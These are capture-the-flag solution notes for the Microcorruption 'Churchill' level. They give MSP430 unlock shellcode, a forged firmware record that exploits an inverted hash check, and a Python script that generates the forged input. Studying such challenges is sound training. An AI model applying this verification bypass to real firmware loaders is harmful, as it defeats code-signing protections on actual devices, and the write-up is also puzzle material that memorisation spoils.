MicroCorruption/22-Churchill/notes.md

2022-12-12 03:03:53 +00:00

Open question: Churchill seems not to verify anything past 0xff bytes? (The length field is a single byte, see the layout below.)
## Sample input
```hex
8000 00 06 3041 c26436953f8f3cadf1442fc218b185051ab6c20853a45f093fc32adf31529d05a5ec3e96a9e41ed9ad1b14dcbdb98e50e37a7ddc3d595b867807ed1605f2070e
```
## Layout

Each record is `loadaddr | sig type | length | payload | signature`. The length byte counts the whole record up to the signature, i.e. the 4 header bytes plus the payload (0x06 for the 2-byte `ret`, 0x0c for the 8-byte shellcode). Signature type 00 is an ed25519 signature (64 bytes), type 01 is a SHA-512 hash (also 64 bytes).

Load addr | Sig type      | Length | Payload          | Signature / hash
----------|---------------|--------|------------------|-----------------
8000      | 00 (ed25519)  | 06     | 3041 (ret)       | c26436...
8000      | 01 (sha512)   | 0c     | 324000ffb0121000 | f009805ec519029923b72a6e63589a081295759bbf7e12090be7b784f622a24e135d2603b861cc0398b366b1a5d8a89836544a164c39f4e68361413ab6f049a5
The 8-byte payload disassembles to (MSP430, little-endian words):

```asm
3240 00ff    mov  #0xff00, sr   ; high byte of SR = interrupt number 0x7f (unlock)
b012 1000    call #0x0010       ; enter the interrupt gate with that SR
```
## Payload

Record (load addr, type 01 = sha512, length 0c, shellcode):

```hex
8000 01 0c 3240 00ff b012 1000
```

SHA-512 hash of it:

```hex
80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec
```

Complete payload (record followed by the hash):

```hex
8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40ec
```
# THE TWIST

The program checks the result of the hash comparison against `0x1`, not against `0`. A signature that matches the computed hash byte for byte therefore FAILS, because `memcmp` returns `0` for identical buffers.

Solution: subtract 1 from the last byte of the supplied signature. It is then off by one, and when the program compares it against the computed hash it ends up with `0x0001` in r15, which is exactly what the check wants. Caveat: this relies on the last byte being non-zero; `0x00 - 1` wraps to `0xff`, which would make the supplied byte larger than the computed one and flip the sign of the comparison.
# Final answer

Same as the complete payload above, with the last byte of the hash decremented (`ec` -> `eb`):

```hex
8000 01 0c 324000ff b0121000 80a0ca7614b653247b207a739e8a5445bfc34f755d4bd0bd413ec5f65a748fe04f9488f7e10700b5bfb57f41ba56f2a314a0f9545b74d08764af7a5c0cfc40eb
```
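The forging procedure above as a script, added to these notes (not part of the original solve). It assumes what the values in the notes imply: the length byte counts the 4 header bytes plus the payload, the SHA-512 is computed over the whole record, and the binary's comparison is memcmp-like (the first differing byte decides the result). It generalises the last-byte trick to "decrement the last non-zero byte", which is identical to the notes' method when the trailing byte is non-zero (0xec here) but still produces a result of exactly 1 when the hash happens to end in 0x00. The names `build_record`, `msp_memcmp`, `off_by_one_signature` and `forge` are this example's, not the level's.

```python
import hashlib

# Constructed inputs, taken from the notes above: load address bytes as they
# appear in the record, signature type 0x01 (sha512 per the layout table), and
# the 8-byte MSP430 payload "mov #0xff00, sr; call #0x0010".
LOAD_ADDR = bytes.fromhex("8000")
SIG_TYPE_SHA512 = 0x01
PAYLOAD = bytes.fromhex("324000ff" "b0121000")


def build_record(load_addr: bytes, sig_type: int, payload: bytes) -> bytes:
    """Build loadaddr | type | length | payload.

    Assumption (matches both rows of the layout table: 0x06 for a 2-byte
    payload, 0x0c for an 8-byte one): the length byte counts the whole
    record up to the signature, i.e. 4 header bytes + payload.
    """
    length = 4 + len(payload)
    if length > 0xFF:
        raise ValueError("length field is a single byte")
    return load_addr + bytes([sig_type, length]) + payload


def expected_digest(record: bytes) -> bytes:
    """Assumption: the hash the firmware compares covers the whole record."""
    return hashlib.sha512(record).digest()


def msp_memcmp(a: bytes, b: bytes) -> int:
    """memcmp-style compare: 0 if equal, otherwise a[i] - b[i] for the first
    differing byte. A one-byte decrement in b therefore yields exactly 1,
    matching the 0x0001 the notes see in r15."""
    for x, y in zip(a, b):
        if x != y:
            return x - y
    return len(a) - len(b)


def off_by_one_signature(digest: bytes) -> bytes:
    """Make msp_memcmp(digest, sig) return 1 instead of 0.

    The notes subtract 1 from the last byte. That only works when the last
    byte is non-zero (0x00 - 1 wraps to 0xff and flips the sign of the
    comparison), so decrement the last non-zero byte instead; for the digest
    in the notes (last byte 0xec) both give the same answer.
    """
    sig = bytearray(digest)
    for i in range(len(sig) - 1, -1, -1):
        if sig[i] != 0:
            sig[i] -= 1
            return bytes(sig)
    raise ValueError("all-zero digest: nothing to decrement")


def forge(load_addr: bytes = LOAD_ADDR, payload: bytes = PAYLOAD) -> bytes:
    """Full image: record followed by the off-by-one 'signature'."""
    record = build_record(load_addr, SIG_TYPE_SHA512, payload)
    return record + off_by_one_signature(expected_digest(record))


if __name__ == "__main__":
    print(forge().hex())
```

Paste the printed hex as the firmware input. `msp_memcmp` is only a model of the check; if the real compare in the binary returned the raw byte difference rather than a sign, the decrement-by-one still gives exactly 1, which is why the trick is robust to either implementation.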